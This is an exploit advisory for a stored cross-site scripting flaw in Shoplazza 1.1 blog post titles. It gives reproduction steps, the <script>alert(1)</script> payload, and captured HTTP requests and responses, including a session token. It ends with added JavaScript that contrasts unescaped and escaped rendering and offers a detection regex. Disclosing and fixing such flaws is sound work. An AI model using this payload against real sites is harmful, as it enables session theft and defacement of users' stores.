# Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Andrey Stoykov
# Software Link: https://github.com/Shoplazza/LifeStyle
# Version: 1.1
# Tested on: Ubuntu 20.04

Stored XSS #1:

To reproduce do the following:

1. Login as normal user account
2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"
3. Select "Title" and enter payload "><script>alert(1)</script>

// HTTP request showing XSS payload

PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1.1
Host: test1205.myshoplaza.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]

{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\">","content":"\">"[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
[...]

{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\">","published":true,"seo_title":"Title\">"[...]

// HTTP GET request to trigger XSS payload

GET /blog/titlescriptalert1script?st=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUKEnfj9L49I HTTP/1.1
Host: test1205.myshoplaza.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
[...]

Title"><script>alert(1)</script>
[...]
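The root cause shown above is that the stored title is accepted as-is by the admin API (which is fine for JSON) and then written into the blog page without HTML escaping. The following is an added example, not Shoplazza's code: it contrasts raw interpolation with escaping at the point of output, using a constructed article object shaped like the API JSON in the advisory, and adds a small audit check for stored titles that carry markup. The `<h1 class="article-title">` wrapper is an assumption, not the theme's actual markup.

```javascript
// Added example (not Shoplazza's code). Constructed sample mirroring the
// article JSON returned by PATCH /admin/api/admin/articles/<id>.
const sampleArticle = {
  id: "2dc688b1-ac9e-46d7-8e56-57ded1d45bf5",
  title: 'Title"><script>alert(1)</script>',
  published: true,
};

// Escape the characters that matter in HTML text and attribute contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: the stored title is dropped straight into the markup,
// so the "> breaks out of the element and the script tag is parsed as HTML.
// (The wrapper element is assumed; the advisory does not show the template.)
function renderTitleUnsafe(article) {
  return `<h1 class="article-title">${article.title}</h1>`;
}

// Fixed pattern: escape at the point of output, so the same stored value is
// displayed literally and never interpreted as tags.
function renderTitleSafe(article) {
  return `<h1 class="article-title">${escapeHtml(article.title)}</h1>`;
}

// Audit check for already-stored data: flag titles containing a tag opener
// or a quote immediately followed by ">" (attribute break-out).
function titleLooksInjected(article) {
  return /<\s*[a-z!\/]|["']\s*>/i.test(article.title);
}

console.log(renderTitleUnsafe(sampleArticle)); // script element survives
console.log(renderTitleSafe(sampleArticle));   // entity-encoded, inert text
```

Escaping must match the output context; a title placed inside a JavaScript string or a URL needs a different encoder than the HTML one shown here.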